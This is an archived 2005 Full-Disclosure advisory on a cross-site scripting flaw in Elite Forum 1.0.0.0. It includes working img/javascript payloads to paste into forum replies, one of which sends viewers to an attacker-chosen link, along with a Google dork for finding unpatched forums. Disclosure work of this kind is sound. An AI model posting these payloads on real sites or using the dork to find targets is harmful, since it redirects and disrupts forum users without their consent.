[Full-disclosure] HYSA-2005-009 Elite Forum 1.0.0.0 XSS Vulnerability
From: h4cky0u (h4cky0u.org_at_gmail.com)
Date: 11/01/05
- Previous message: Stefan Esser: "[Full-disclosure] Re: Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 1 Nov 2005 15:16:13 +0530 To: full-disclosure@lists.grok.org.uk
------------------------------------------------------
HYSA-2005-009 h4cky0u.org <http://h4cky0u.org> Advisory 009
------------------------------------------------------
Date - Tue Nov 1 2005
TITLE:
======
Elite Forum 1.0.0.0 <http://1.0.0.0> XSS Vulnerability
SEVERITY:
=========
Medium
SOFTWARE:
=========
Elite Forum 1.0.0.0 <http://1.0.0.0>
INFO:
=====
Elite Forum is a fierce competitor entering the world of forum systems.
Unlike many other choices, Elite Forum does not
require the hassle of a MySQL database. Elite Forum is one of the best and
is packed full of features, including the
following: No MySQL database required, Very easy installation, Support for
both user registration and guests, Private
Messaging System, Forum can be locked so registration is required, User,
forum and topic statistics, Fast and easy to use
search system, Ability to view who is currently browsing the forum, Sticky
Topics (Announcements), Full member list,
Unlimited users, topics and posts, Member Profiles/Stats, Multiple page
support (both topics and posts user definable),
Selectable time offset, Ability to auto check for updates/patches, Clean and
streamlined design, Smiley Support, BB Code and
auto url support, Topic status icons, Member and Guest user levels, Members
can edit or delete their posts, Secure accounts,
Add or remove admins via administrator panel, Admins can edit/delete any
post or topic.
Support Website :
www.all-interviews.com/firestorm/?act=eliteforum<http://www.all-interviews.com/firestorm/?act=eliteforum>(Down
at the time of Bug Discovery)
BUG DESCRIPTION:
================
The system is vulnerable to Cross Site Scripting attacks. This issue is due
to a failure of the application to properly
sanitize user-supplied input.
POC:
====
First find a forum running the Elite Forum package. Then click on a topic
and then Post Reply. In the message box add any of
the following codes. Here are some examples:
<img src="javascript:void(window.location=('imagelink'))"> - Replace the
imagelink with the link to the image you want to
redirect the users viewing the topic containing this code.
<img src="javascript:a=100;while(a>=0){alert(a);a--}">
<img src="javascript:a=1;while(a>0){alert("sup?")">
VENDOR STATUS:
==============
The support site is down and no vendor contact could be found.
FIX:
====
No fix available as of date.
GOOGLEDORK:
===========
"Powered by Elite Forum"
CREDITS:
========
This vulnerability was discovered and researched by
Gladiator.KHF(handle/username - gladiator) of h4cky0u Security Forums.
mail : gleden123 at Yahoo dot Com
web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
==================
http://www.h4cky0u.org/advisories/HYSA-2005-009-elite-forum.txt
-- http://www.h4cky0u.org (In)Security at its best...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Stefan Esser: "[Full-disclosure] Re: Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
